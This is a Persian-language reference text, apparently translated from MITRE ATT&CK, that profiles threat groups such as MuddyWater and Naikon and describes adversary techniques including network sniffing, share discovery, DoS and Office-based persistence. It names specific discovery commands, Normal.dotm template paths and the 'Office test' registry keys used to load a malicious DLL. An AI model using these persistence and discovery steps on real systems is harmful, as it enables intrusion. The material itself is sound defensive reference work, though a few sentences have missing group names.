Mofang احتمالاً یک گروه جاسوسی سایبری مستقر در چین است که به دلیل تقلید مکرر از زیرساخت های قربانی نامگذاری شده است. این دشمن حداقل از ماه می 2012 مشاهده شده است که حملات متمرکزی را علیه زیرساخت‌های دولتی و حیاتی در میانمار و همچنین چندین کشور و بخش دیگر از جمله صنایع نظامی، خودروسازی و تسلیحاتی انجام می‌دهد.

Molerats یک گروه تهدید کننده عرب زبان و با انگیزه سیاسی است که از سال 2012 فعالیت می کند. قربانیان این گروه عمدتاً در خاورمیانه، اروپا و ایالات متحده بوده اند.

MuddyWater یک گروه تهدید ایرانی است که عمدتاً کشورهای خاورمیانه را هدف قرار داده است و کشورهای اروپایی و آمریکای شمالی را نیز هدف قرار داده است. قربانیان این گروه عمدتاً در بخش مخابرات، دولتی (خدمات فناوری اطلاعات) و نفت هستند. فعالیت این گروه قبلاً به مرتبط بود، اما اعتقاد بر این است که این گروه یک گروه متمایز است که احتمالاً انگیزه آنها جاسوسی است.

Mustang Panda یک عامل تهدید جاسوسی سایبری مستقر در چین است که برای اولین بار در سال 2017 مشاهده شد، اما ممکن است حداقل از سال 2014 در حال انجام عملیات باشد. موستانگ پاندا نهادهای دولتی، غیرانتفاعی، مذهبی و سایر سازمان های غیر دولتی را در ایالات متحده و آلمان، مغولستان، میانمار، پاکستان، و ویتنام را مورد هدف قرار داده است.

چارچوب نیروی کار امنیت سایبری NICE پایه‌ای برای افزایش اندازه و توانایی نیروی کار امنیت سایبری ایالات متحده است. این یک تعریف مشترک از امنیت سایبری، یک لیست جامع از وظایف امنیت سایبری، دانش و مهارت‌ها و توانایی‌های مورد نیاز برای انجام این وظایف را ارائه می‌دهد. چارچوب NICEاز اجزای زیر تشکیل شده است: نقش‌های کاری، دقیق‌ترین گروه‌بندی کارهای امنیت سایبری شامل دانش، مهارت‌ها و توانایی‌های خاصی که برای انجام وظایف در نقش‌ها مورد نیاز است.

دشمنان ممکن است با رابط برنامه نویسی برنامه نویسی بومی سیستم عامل (API) برای اجرای رفتارها تعامل داشته باشند. APIهای بومی ابزاری کنترل‌شده برای فراخوانی سرویس‌های سیستم‌عامل سطح پایین در هسته، مانند مواردی که شامل سخت‌افزار/دستگاه‌ها، حافظه و فرآیندها هستند، ارائه می‌کنند. این API های بومی توسط سیستم عامل در هنگام بوت شدن سیستم (زمانی که سایر اجزای سیستم هنوز راه اندازی نشده اند) و همچنین انجام وظایف و درخواست ها در طول عملیات روتین مورد استفاده قرار می گیرند.

شاخص امنیت سایبری ملی یک شاخص زنده جهانی است که آمادگی کشورها را برای جلوگیری از تهدیدات سایبری و مدیریت حوادث سایبری اندازه گیری می کند. NCSI همچنین یک پایگاه داده با مدارک در دسترس عموم و ابزاری برای ظرفیت سازی امنیت سایبری ملی است.

دشمنان ممکن است با به خطر انداختن دستگاه های شبکه پیرامونی، مرزهای شبکه را پل بزنند. نقض این دستگاه‌ها ممکن است دشمن را قادر سازد تا محدودیت‌های مسیریابی ترافیک را که در غیر این صورت شبکه‌های قابل اعتماد و غیرقابل اعتماد را از هم جدا می‌کند، دور بزند. از دستگاه هایی مانند روترها و فایروال ها می توان برای ایجاد مرز بین شبکه های قابل اعتماد و غیرقابل اعتماد استفاده کرد. آنها با محدود کردن انواع ترافیک برای اجرای سیاست های سازمانی در تلاش برای کاهش ریسک ذاتی در چنین ارتباطاتی به این امر دست می یابند. محدودیت ترافیک را می توان با ممنوع کردن آدرس های IP، پورت های پروتکل لایه 4 یا از طریق بازرسی عمیق بسته برای شناسایی برنامه ها به دست آورد. برای مشارکت با بقیه شبکه، این دستگاه‌ها می‌توانند مستقیماً آدرس‌پذیر یا شفاف باشند، اما نحوه عملکرد آن‌ها هیچ تأثیری بر نحوه دور زدن دشمن در صورت به خطر انداختن آنها ندارد. هنگامی که یک دشمن کنترل چنین دستگاه مرزی را به دست می‌گیرد، می‌تواند اجرای سیاست‌های آن را دور بزند تا ترافیک ممنوعه معمولی را از مرز اعتماد بین دو شبکه جدا شده بدون مانع عبور دهد. با دستیابی به حقوق کافی بر روی دستگاه، دشمن می‌تواند دستگاه را به گونه‌ای پیکربندی مجدد کند که به ترافیک مورد نظر خود اجازه دهد، و به آنها اجازه می‌دهد تا به اهدافی مانند فرمان و کنترل از طریق Multi-hop Proxy یا استخراج داده‌ها از طریق Traffic Duplication دست یابند. در مواردی که یک دستگاه مرزی دو سازمان مجزا را از هم جدا می کند، دشمن همچنین می تواند حرکت جانبی را به محیط های قربانی جدید تسهیل کند.

دشمنان ممکن است برای گرفتن اطلاعات در مورد یک محیط، از جمله مطالب احراز هویت ارسال شده از طریق شبکه، ترافیک شبکه را استشمام کنند. شنود شبکه به استفاده از رابط شبکه در یک سیستم برای نظارت یا ضبط اطلاعات ارسال شده از طریق یک اتصال سیمی یا بی سیم اشاره دارد. یک دشمن ممکن است یک رابط شبکه را در حالت بی‌وقفه قرار دهد تا به طور غیرفعال به داده‌های در حال انتقال از طریق شبکه دسترسی پیدا کند، یا از پورت‌های دهانه برای گرفتن مقدار بیشتری از داده استفاده کند. داده‌های جمع‌آوری‌شده از طریق این تکنیک ممکن است شامل اطلاعات کاربری کاربر، به‌ویژه آنهایی باشد که از طریق یک پروتکل ناامن و رمزگذاری نشده ارسال می‌شوند. تکنیک‌های مسمومیت با وضوح نام سرویس، مانند مسمومیت LLMNR/NBT-NS و SMB Relay نیز می‌تواند برای گرفتن اعتبار به وب‌سایت‌ها، پروکسی‌ها و سیستم‌های داخلی با هدایت ترافیک به یک دشمن استفاده شود. شنود شبکه همچنین ممکن است جزئیات پیکربندی، مانند سرویس‌های در حال اجرا، شماره نسخه، و سایر ویژگی‌های شبکه (مانند آدرس‌های IP، نام میزبان، شناسه‌های (VLAN) را که برای فعالیت‌های بعدی Lateral Movement and/or Defense Evasion activities ضروری هستند، نشان دهد.

دشمنان ممکن است سعی کنند فهرستی از خدماتی که روی میزبان‌های راه دور اجرا می‌شوند، از جمله سرویس‌هایی که ممکن است در برابر بهره برداری از نرم‌افزار از راه دور آسیب پذیر باشند، دریافت کنند. روش‌های به دست آوردن این اطلاعات شامل اسکن پورت و اسکن آسیب‌پذیری با استفاده از ابزارهایی است که روی یک سیستم آورده می‌شوند. در محیط‌های ابری، دشمنان ممکن است تلاش کنند سرویس‌هایی را که روی میزبان‌های ابر دیگر اجرا می‌شوند، کشف کنند. علاوه بر این، اگر محیط ابری به یک محیط داخلی متصل باشد، ممکن است دشمنان بتوانند خدماتی را که در سیستم‌های غیر ابری اجرا می‌شوند نیز شناسایی کنند.

دشمنان ممکن است به دنبال پوشه‌ها و درایوهای اشتراک‌گذاری شده در سیستم‌های راه دور به‌عنوان وسیله‌ای برای شناسایی منابع اطلاعاتی برای جمع‌آوری به عنوان پیش‌رو برای جمع‌آوری و شناسایی سیستم‌های بالقوه مورد علاقه برای حرکت جانبی باشند. شبکه‌ها اغلب حاوی درایوها و پوشه‌های شبکه مشترک هستند که کاربران را قادر می‌سازد به فهرست‌های فایل در سیستم‌های مختلف در سراسر شبکه دسترسی داشته باشند. اشتراک گذاری فایل از طریق شبکه ویندوز از طریق پروتکل SMB انجام می شود. Net را می توان برای پرس و جو از یک سیستم راه دور برای درایوهای مشترک موجود با استفاده از دستور net view \\remotesystem استفاده کرد. همچنین می توان از آن برای پرس و جو درایوهای مشترک در سیستم محلی با استفاده از اشتراک خالص استفاده کرد. برای macOS، دستور sharing -l تمام نقاط مشترک مورد استفاده برای سرویس‌های smb را فهرست می‌کند.

دشمنان ممکن است از یک پروتکل لایه غیر کاربردی برای ارتباط بین میزبان و سرور C2یا بین میزبان های آلوده در یک شبکه استفاده کنند. فهرست پروتکل های ممکن گسترده است. مثال‌های خاص شامل استفاده از پروتکل‌های لایه شبکه، مانند پروتکل پیام کنترل اینترنت (ICMP)، پروتکل‌های لایه انتقال، مانند پروتکل داده‌گرام کاربر (UDP)، پروتکل‌های لایه جلسه، مانند Socket Secure (SOCKS) و همچنین هدایت‌شده است. پروتکل های تونل شده / مانند سریال از طریقLAN (SOL) ارتباط ICMP بین میزبان ها یک مثال است. از آنجایی که ICMP بخشی از مجموعه پروتکل اینترنت است، باید توسط همه میزبان های سازگار با IP پیاده سازی شود. با این حال، به طور معمول مانند سایر پروتکل های اینترنتی مانند TCP یا UDP نظارت نمی شود و ممکن است توسط دشمنان برای پنهان کردن ارتباطات استفاده شود.

دشمنان ممکن است با استفاده از یک پروتکل و تقسیم پورت که معمولاً مرتبط نیستند ارتباط برقرار کنند. به عنوان مثال، HTTPS بر روی پورت 8088 یا پورت 587 برخلاف پورت سنتی 443. دشمنان ممکن است تغییراتی در پورت استاندارد مورد استفاده توسط یک پروتکل برای دور زدن فیلتر کردن یا تجزیه و تحلیل/تجزیه داده های شبکه ایجاد کنند.

دشمنان ممکن است حملات انکار خدمات شبکه را برای کاهش یا مسدود کردن دسترسی به منابع هدف برای کاربران انجام دهند. DoS شبکه را می توان با پایان دادن به خدمات پهنای باند شبکه که بر آن تکیه می کنند، انجام داد. منابع نمونه شامل وب سایت های خاص، خدمات ایمیل، DNS و برنامه های کاربردی مبتنی بر وب است. مشاهده شده است که دشمنان حملات DoS شبکه ای را برای اهداف سیاسی و برای حمایت از سایر فعالیت های مخرب، از جمله حواس پرتی، هکتیکیسم، و اخاذی انجام می دهند. هنگامی که ظرفیت پهنای باند اتصال شبکه به یک سیستم به دلیل حجم ترافیک مخرب هدایت شده به منبع یا اتصالات شبکه و دستگاه های شبکه ای که منبع به آنها تکیه می کند، DoS شبکه رخ می دهد. به عنوان مثال، یک دشمن ممکن است 10 گیگابیت در ثانیه ترافیک را به سروری ارسال کند که توسط شبکه ای با اتصال 1 گیگابیت بر ثانیه به اینترنت میزبانی می شود. این ترافیک می تواند توسط یک سیستم منفرد یا چندین سیستم پراکنده در سراسر اینترنت ایجاد شود که معمولاً به آن DoS توزیع شده ( DDoS) می گویند. برای انجام حملات شبکه DoS چندین جنبه برای چندین روش اعمال می شود، از جمله جعل آدرس IP و بات نت ها. دشمنان ممکن است از آدرس IP اصلی یک سیستم مهاجم استفاده کنند، یا آدرس IP منبع را جعل کنند تا ردیابی ترافیک حمله به سیستم مهاجم یا فعال کردن بازتاب را دشوارتر کنند. این می تواند با کاهش یا حذف اثربخشی فیلتر کردن توسط آدرس منبع در دستگاه های دفاعی شبکه، دشواری دفاع در برابر حمله را افزایش دهد. برای حملات DoS که مستقیماً سیستم میزبان را هدف قرار می دهند، به Endpoint Denial of Service مراجعه کنید.

Naikon یک گروه جاسوسی سایبری تحت حمایت دولت است که به دفتر شناسایی فنی دوم منطقه نظامی چنگدو در ارتش آزادی بخش خلق چین مشخص کننده پوشش واحد نظامی78020 نسبت داده می شود. نایکون که حداقل از سال 2010 فعال است، عمدتاً علیه سازمان‌های دولتی، نظامی و مدنی در آسیای جنوب شرقی و همچنین علیه نهادهای بین‌المللی مانند برنامه توسعه سازمان ملل متحد و انجمن کشورهای جنوب شرق آسیا عملیات انجام داده است. در حالی که Naikon برخی از ویژگی‌های مشترک را با دارد، به نظر نمی‌رسد که این دو گروه دقیقاً مطابقت داشته باشند.

NEODYMIUM یک گروه فعالیت است که در ماه می 2016 کمپینی را انجام داد و قربانیان ترک را به شدت هدف قرار داده است. این گروه به دلیل تداخل ویژگی های قربانی و مبارزات انتخاباتی، شباهت خود را به گروه فعالیت دیگری به نام PROMETHIUM نشان داده است. NEODYMIUM گزارش شده است که ارتباط نزدیکی با عملیات BlackOasis دارد، اما شواهدی مبنی بر اینکه نام گروه ها نام مستعار هستند شناسایی نشده است.

Night Dragon یک نام کمپین برای فعالیت‌هایی است که شامل یک گروه تهدید می‌شود که عمدتاً در چین فعالیت‌هایی را انجام داده‌اند.

Nomadic Octopus یک گروه تهدید جاسوسی سایبری روسی زبان است که حداقل از سال 2014 عمدتاً آسیای مرکزی، از جمله دولت‌های محلی، نمایندگی های دیپلماتیک و افراد را هدف قرار داده است. اختاپوس Nomadic مشاهده شده است که کمپین‌هایی را شامل بدافزار اندروید و ویندوز انجام می‌دهد که عمدتاً از برنامه نویسی دلفی استفاده می کند. زبان، و ساخت انواع سفارشی.

سرریز بافر یا سرریز شدن بافر زمانی رخ می‌دهد که داده‌های بیشتری از یک بافر با طول ثابت در اختیار قرار گیرد. اطلاعات اضافی، که باید به جایی برسد، می‌تواند به فضای حافظه مجاور سرازیر شود و داده‌های موجود در آن فضا را خراب یا رونویسی کند.

دشمنان ممکن است قابلیت‌هایی را بخرند و/ یا بدزدند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. دشمنان به جای توسعه قابلیت‌های خود در داخل، ممکن است آنها را خریداری، دانلود کنند، یا سرقت کنند. فعالیت‌ها ممکن است شامل دستیابی به بدافزار، نرم‌افزار (از جمله مجوزها)، سوء استفاده‌ها، گواهی‌ها و اطلاعات مربوط به آسیب‌پذیری‌ها باشد. دشمنان ممکن است قابلیت‌هایی برای پشتیبانی از عملیات خود در طول مراحل متعدد چرخه حیات دشمن به دست آورند. علاوه بر دانلود بدافزار، نرم افزار و سوء استفاده رایگان از اینترنت، دشمنان ممکن است این قابلیت‌ها را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری باشند که در بدافزارها و سوء استفاده‌ها، بازارهای جنایی یا افراد متخصص تخصص دارند. علاوه بر خرید قابلیت‌ها، دشمنان ممکن است قابلیت‌هایی را از نهادهای شخص ثالث (از جمله سایر دشمنان) سرقت کنند. این می‌تواند شامل سرقت مجوزهای نرم‌افزار، بدافزار، SSL/TLS و گواهی‌های امضای کد، یا حمله به پایگاه‌های داده بسته آسیب‌پذیری‌ها یا سوءاستفاده‌ها باشد.

دشمنان ممکن است بدافزاری را خریداری، سرقت یا دانلود کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. نرم افزارهای مخرب می توانند شامل payloadها، droppers، ابزارهایpost-compromise، Backdoors، Packers و پروتکل های C2 باشند. دشمنان ممکن است بدافزاری را برای پشتیبانی از عملیات خود، به دست آوردن ابزاری برای حفظ کنترل ماشین های راه دور، فرار از دفاع و اجرای رفتارهای پس از سازش به دست آورند. علاوه بر دانلود بدافزار رایگان از اینترنت، دشمنان ممکن است این قابلیت ها را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری متخصص در توسعه بدافزار، بازارهای جنایی شامل Malware-as-a-a-Service یا ( MaaS) یا افراد باشند. علاوه بر خرید بدافزار، دشمنان ممکن است بدافزار را از نهادهای شخص ثالث (از جمله سایر دشمنان) بدزدند و از آنها استفاده مجدد کنند.

دشمنان ممکن است ابزارهای نرم‌افزاری را بخرند، سرقت کنند یا دانلود کنند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. ابزارها می توانند منبع باز یا بسته، رایگان یا تجاری باشند. یک ابزار می تواند برای اهداف مخرب توسط یک دشمن مورد استفاده قرار گیرد، اما (برخلاف بدافزار) قرار نبود برای آن اهداف استفاده شود مثلاً (PsExec)دستیابی به ابزار می‌تواند شامل تهیه مجوزهای نرم‌افزار تجاری، از جمله برای ابزارهای قرمز رنگ مانند Cobalt Strike باشد. نرم‌افزار تجاری ممکن است از طریق خرید، سرقت مجوزها (یا نسخه‌های مجاز نرم‌افزار)، یا کرک کردن نسخه‌های آزمایشی به دست آید. دشمنان ممکن است ابزارهایی را برای پشتیبانی از عملیات خود، از جمله برای حمایت از اجرای رفتارهای پس از سازش به دست آورند. علاوه بر دانلود رایگان یا خرید نرم‌افزار، دشمنان ممکن است نرم‌افزار و/یا مجوزهای نرم‌افزار را از نهادهای شخص ثالث (از جمله سایر دشمنان) سرقت کنند.

دشمنان ممکن است گواهی‌های امضای کد را بخرند و یا بدزدند که می‌تواند در هنگام هدف‌گیری استفاده شود. امضای کد فرآیند امضای دیجیتالی فایل‌های اجرایی و اسکریپت‌ها برای تایید نویسنده نرم افزار و تضمین عدم تغییر یا خرابی کد است. امضای کد سطحی از اعتبار برنامه را از سوی توسعه دهنده و تضمین عدم دستکاری برنامه را فراهم می‌کند. کاربران و یا ابزارهای امنیتی ممکن است به یک کد امضا شده بیشتر از یک کد بدون امضا اعتماد کنند، حتی اگر ندانند چه کسی گواهی را صادر کرده یا نویسنده آن کیست. قبل از امضای کد، دشمنان ممکن است گواهی امضای کد را برای استفاده در عملیات خریداری یا سرقت کنند. خرید گواهی‌های امضای کد ممکن است با استفاده از یک سازمان جلویی یا با استفاده از اطلاعات به سرقت رفته از یک نهاد در معرض خطر قبلی انجام شود که به حریف اجازه می‌دهد تا به یک ارائه‌دهنده گواهی به عنوان آن موجودیت اعتبار سنجی کند. دشمنان همچنین ممکن است مواد امضای کد را مستقیماً از یک شخص ثالث در معرض خطر سرقت کنند.

دشمنان ممکن است گواهی‌های SSL/TLS را خریداری و یا بدزدند که می‌توانند در هنگام هدف‌گیری استفاده شوند. گواهینامه‌های SSL/TLSبرای القای اعتماد طراحی شده‌اند. آنها شامل اطلاعاتی درباره کلید، اطلاعاتی درباره هویت مالک آن و امضای دیجیتالی نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط با صاحب آن استفاده کند. دشمنان ممکن است گواهی‌های SSL/TLSرا برای پیشبرد عملیات خود خریداری یا سرقت کنند، مانند رمزگذاری ترافیک C2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا حتی فعال کردن Adversary-in-the-Middle در صورتی که گواهی مورد اعتماد باشد یا به شکل دیگری به ریشه آن اضافه شود. خرید گواهی‌های دیجیتال ممکن است با استفاده از یک سازمان جلویی یا با استفاده از اطلاعات به سرقت رفته از یک نهاد در معرض خطر قبلی انجام شود که به حریف اجازه می‌دهد تا به یک ارائه‌دهنده گواهی به عنوان آن نهاد اعتبار سنجی کند. دشمنان همچنین ممکن است مواد گواهی را مستقیماً از یک شخص ثالث در معرض خطر، از جمله از مقامات گواهی، سرقت کنند. دشمنان ممکن است دامنه‌هایی را که بعداً برای آن گواهی SSL/TLSخریداری می‌کنند، ثبت یا هک کنند.

دشمنان ممکن است اکسپلویت‌هایی را بخرند، بدزدند یا دانلود کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. یک اکسپلویت از یک باگ یا آسیب‌پذیری استفاده می‌کند تا باعث ایجاد رفتار ناخواسته یا پیش‌بینی نشده در سخت‌افزار یا نرم‌افزار رایانه شود. دشمن ممکن است به جای توسعه اکسپلویت‌های خود، اکسپلویت‌ها را از آنلاین بیابد/تغییر دهد یا آنها را از فروشندگان اکسپلویت خریداری کند. علاوه بر دانلود اکسپلویت‌های رایگان از اینترنت، دشمنان ممکن است اکسپلویت‌هایی را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری که در توسعه بهره‌برداری، بازارهای جنایی (از جمله کیت‌های بهره‌برداری)، یا افراد متخصص هستند، باشد. علاوه بر خرید اکسپلویت‌ها، دشمنان ممکن است اکسپلویت‌ها را از اشخاص ثالث (از جمله سایر دشمنان) بدزدند و از آنها استفاده مجدد کنند. یک حریف ممکن است تالارهای گفتمان ارائه‌دهنده اکسپلویت را برای درک وضعیت اکسپلویت‌های موجود و همچنین کشف‌شده‌های جدید نظارت کند. معمولاً بین زمانی که یک اکسپلویت کشف می‌شود و زمانی که عمومی می‌شود تاخیر وجود دارد. یک حریف ممکن است سیستم‌های کسانی را هدف قرار دهد که به منظور به دست‌آوردن آن دانش برای استفاده در عملیات بعدی شناخته شده‌اند که تحقیقات و توسعه بهره برداری را انجام می‌دهند. دشمنان ممکن است از اکسپلویت‌ها در طول مراحل مختلف چرخه حیات دشمن استفاده کنند (یعنی بهره‌برداری از برنامه عمومی، بهره‌برداری برای اجرای مشتری، بهره برداری برای افزایش امتیاز، بهره برداری برای فرار دفاعی، بهره برداری برای دسترسی به اعتبار، بهره برداری از خدمات از راه دور و سیستم بهره برداری) .

دشمنان ممکن است اطلاعاتی درباره آسیب‌پذیری‌هایی که می‌توانند در طول هدف‌گیری استفاده شوند، به دست آورند. آسیب‌پذیری یک ضعف در سخت‌افزار یا نرم‌افزار رایانه است که می‌تواند به‌طور بالقوه توسط دشمن مورد سوءاستفاده قرار گیرد تا رفتار ناخواسته یا پیش‌بینی‌نشده‌ای را ایجاد کند. دشمنان ممکن است اطلاعات آسیب‌پذیری را با جستجو در پایگاه‌های اطلاعاتی باز یا دسترسی به پایگاه‌های اطلاعاتی آسیب‌پذیری بسته پیدا کنند. یک دشمن ممکن است افشای آسیب‌پذیری‌ها/پایگاه‌های اطلاعاتی را برای درک وضعیت آسیب‌پذیری‌های موجود و همچنین آسیب‌پذیری‌های تازه کشف‌شده نظارت کند. معمولاً بین زمانی که یک آسیب‌پذیری کشف می‌شود و زمانی که عمومی می‌شود، تاخیر وجود دارد. یک دشمن ممکن است سیستم های کسانی را که برای انجام تحقیقات آسیب پذیری شناخته شده اند (از جمله فروشندگان تجاری) هدف قرار دهد. آگاهی از یک آسیب‌پذیری ممکن است باعث شود که حریف به دنبال یک اکسپلویت موجود (یعنی اکسپلویت‌ها) بگردد یا خودش برای توسعه آن (یعنی اکسپلویت‌ها) تلاش کند.

دشمنان ممکن است از برنامه های مبتنی بر مایکروسافت آفیس برای تداوم بین راه اندازی ها استفاده کنند. مایکروسافت آفیس یک مجموعه کاربردی نسبتاً رایج در سیستم عامل های مبتنی بر ویندوز در یک شبکه سازمانی است. مکانیسم‌های متعددی وجود دارد که می‌توان با آفیس برای تداوم در هنگام راه‌اندازی یک برنامه مبتنی بر آفیس استفاده کرد. این می تواند شامل استفاده از ماکروها و افزونه های قالب آفیس باشد. ویژگی‌های مختلفی در Outlook کشف شده‌اند که می‌توان از آنها برای به دست آوردن ماندگاری سوء استفاده کرد، مانند قوانین Outlook، فرم‌ها و صفحه اصلی. این مکانیسم‌های ماندگاری می‌توانند در Outlook کار کنند یا از طریق Office 365 استفاده شوند.

دشمنان ممکن است از الگوهای مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. مایکروسافت آفیس شامل قالب هایی است که بخشی از برنامه های معمول آفیس هستند و برای سفارشی کردن سبک ها استفاده می شوند. هر بار که یک برنامه شروع می شود از قالب های پایه در برنامه استفاده می شود. ماکروهای Visual Basic for Applications (VBA)را می توان در قالب پایه قرار داد و برای اجرای کد هنگام شروع برنامه آفیس مربوطه به منظور به دست آوردن ماندگاری استفاده کرد. نمونه هایی برای Word و Excel کشف و منتشر شده است. به‌طور پیش‌فرض، Word یک الگوی Normal.dotm ایجاد کرده است که می‌توان آن را تغییر داد تا یک ماکرو مخرب را در خود جای دهد. اکسل به طور پیش فرض یک فایل الگو ندارد، اما می توان آن را اضافه کرد که به طور خودکار بارگیری می شود. الگوهای به اشتراک گذاشته شده نیز ممکن است ذخیره شده و از مکان های راه دور کشیده شوند. مکان :Word Normal.dotm C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm مکان Excel Personal.xlsb: C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB دشمنان همچنین ممکن است با ربودن دستور جستجوی برنامه، مکان الگوی پایه را تغییر دهند تا به الگوی خود اشاره کنند، به عنوان مثالWord2016 ابتدا Normal.dotm را در C:\Program Files (x86)\Microsoft Office\root\Office16\ یا با تغییر کلید رجیستری GlobalDotName جستجو می کند. با تغییر کلید رجیستری GlobalDotName، حریف می‌تواند یک مکان دلخواه، نام فایل و پسوند فایل را برای استفاده برای قالبی که در راه‌اندازی برنامه بارگذاری می‌شود، مشخص کند. برای سوء استفاده از GlobalDotName، ممکن است دشمنان ابتدا نیاز داشته باشند که الگو را به عنوان یک سند قابل اعتماد ثبت کنند یا آن را در یک مکان مطمئن قرار دهند. ممکن است یک دشمن بسته به سیاست امنیتی سیستم یا سازمانی در استفاده از ماکروها، ماکروها را فعال کند تا بدون محدودیت اجرا شوند.

دشمنان ممکن است از کلید رجیستری"Office Test" مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. یک مکان رجیستری تست آفیس وجود دارد که به کاربر اجازه می دهد یک DLL دلخواه را مشخص کند که هر بار که برنامه آفیس شروع می شود اجرا می شود. تصور می شود که این کلید رجیستری توسط مایکروسافت برای بارگیری DLL ها برای اهداف آزمایش و اشکال زدایی در حین توسعه برنامه های آفیس استفاده می شود. این کلید رجیستری به‌طور پیش‌فرض در طول نصب آفیس ایجاد نمی‌شود. کلیدهای کاربر و رجیستری جهانی برای ویژگی Office Test وجود دارد: HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf دشمنان ممکن است این کلید رجیستری را اضافه کنند و یک DLL مخرب را مشخص کنند که هر زمان که یک برنامه آفیس مانند Word یا Excel شروع می شود، اجرا می شود.

دشمنان ممکن است از فرم‌های Microsoft Outlook برای به دست آوردن پایداری در یک سیستم آسیب‌دیده سوء استفاده کنند. فرم های Outlook به عنوان الگوهایی برای ارائه و عملکرد در پیام های Outlook استفاده می شوند. فرم‌های سفارشی Outlook را می‌توان ایجاد کرد که زمانی که یک ایمیل ساخته‌شده خاص توسط دشمن با استفاده از همان فرم سفارشی Outlook ارسال می‌شود، کد را اجرا می‌کنند. هنگامی که فرم های مخرب به صندوق پستی کاربر اضافه شد، هنگام راه اندازی Outlook بارگیری می شوند. هنگامی که دشمن یک ایمیل ساخته شده خاص برای کاربر ارسال می کند، فرم های مخرب اجرا می شوند.

دشمنان ممکن است از ویژگی صفحه اصلی Microsoft Outlook برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. صفحه اصلی Outlook یک ویژگی قدیمی است که برای سفارشی کردن ارائه پوشه‌های Outlook استفاده می شود. این ویژگی به شما اجازه می دهد تا هر زمان که یک پوشه باز می شود، یک URL داخلی یا خارجی بارگیری و ارائه شود. می توان یک صفحه HTML مخرب ایجاد کرد که در صورت بارگیری توسط صفحه اصلی Outlook، کد را اجرا می کند.هنگامی که صفحات اصلی مخرب به صندوق پستی کاربر اضافه شد، با راه اندازی Outlook بارگیری می شوند. صفحات اصلی مخرب زمانی اجرا می شوند که پوشه Outlook مناسب بارگیری مجدد شود.

دشمنان ممکن است از افزونه های مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم آسیب دیده سوء استفاده کنند. از افزونه های آفیس می توان برای افزودن قابلیت به برنامه های آفیس استفاده کرد. انواع مختلفی از افزونه ها وجود دارد که می توانند توسط محصولات مختلف Office استفاده شوند. شامل افزونه‌های Word/Excel (WLL/XLL)، افزودنی‌های VBA، افزونه‌هایOffice Component Object Model (COM)، افزونه‌های اتوماسیون، ویرایشگر VBA (VBE)، ابزارهای ویژوال استودیو برای آفیس (VSTO) -ins و افزونه های Outlook . از افزونه ها می توان برای به دست آوردن ماندگاری استفاده کرد زیرا می توان آنها را طوری تنظیم کرد که هنگام شروع یک برنامه آفیس کد را اجرا کنند.

دشمنان ممکن است تلاش کنند تا کشف یا تجزیه و تحلیل یک فایل اجرایی یا فایل را با رمزگذاری، رمزگذاری، یا مخفی کردن محتوای آن در سیستم یا در حین انتقال، دشوار کنند. این یک رفتار رایج است که می تواند در پلتفرم های مختلف و شبکه برای فرار از دفاع استفاده شود. محموله‌ها ممکن است فشرده، بایگانی یا رمزگذاری شوند تا از شناسایی جلوگیری شود. این محموله‌ها ممکن است در حین دسترسی اولیه یا بعداً برای کاهش تشخیص استفاده شوند. گاهی اوقات ممکن است اقدام کاربر برای باز کردن و Deobfuscate/Decode کردن فایل ها یا اطلاعات برای اجرای کاربر مورد نیاز باشد. همچنین ممکن است از کاربر خواسته شود که یک رمز عبور برای باز کردن یک فایل فشرده/رمزگذاری شده محافظت شده با رمز عبور که توسط دشمن ارائه شده است وارد کند. دشمنان همچنین ممکن است از اسکریپت های فشرده یا آرشیو شده مانند جاوا اسکریپت استفاده کنند. بخش‌هایی از فایل‌ها را نیز می‌توان برای پنهان کردن رشته‌های متن ساده کدگذاری کرد که در غیر این صورت به مدافعان در کشف کمک می‌کرد. محموله‌ها همچنین ممکن است به فایل‌های مجزا و به ظاهر خوش‌خیم تقسیم شوند که تنها در صورت مونتاژ مجدد، عملکردهای مخرب را آشکار می‌کنند. دشمنان همچنین ممکن است دستورات اجرا شده از محموله ها یا مستقیماً از طریق یک مترجم دستور و اسکریپت را مبهم کنند. متغیرهای محیطی، نام مستعار، کاراکترها، و دیگر معنایی خاص پلتفرم/زبان را می توان برای فرار از تشخیص مبتنی بر امضا و مکانیسم های کنترل برنامه استفاده کرد.

دشمنان ممکن است سعی کنند اعتبارنامه ها را برای به دست آوردن اطلاعات ورود به حساب کاربری و اطلاعات اعتبار، معمولاً به شکل هش یا رمز عبور متنی واضح، از سیستم عامل و نرم افزار حذف کنند. سپس می توان از اعتبارنامه ها برای انجام حرکت جانبی و دسترسی به اطلاعات محدود استفاده کرد. تعدادی از ابزارهای ذکر شده در تکنیک‌های فرعی مرتبط ممکن است هم توسط دشمنان و هم توسط آزمایش‌کنندگان حرفه‌ای امنیت استفاده شود. ابزارهای سفارشی اضافی نیز احتمالا وجود دارد.

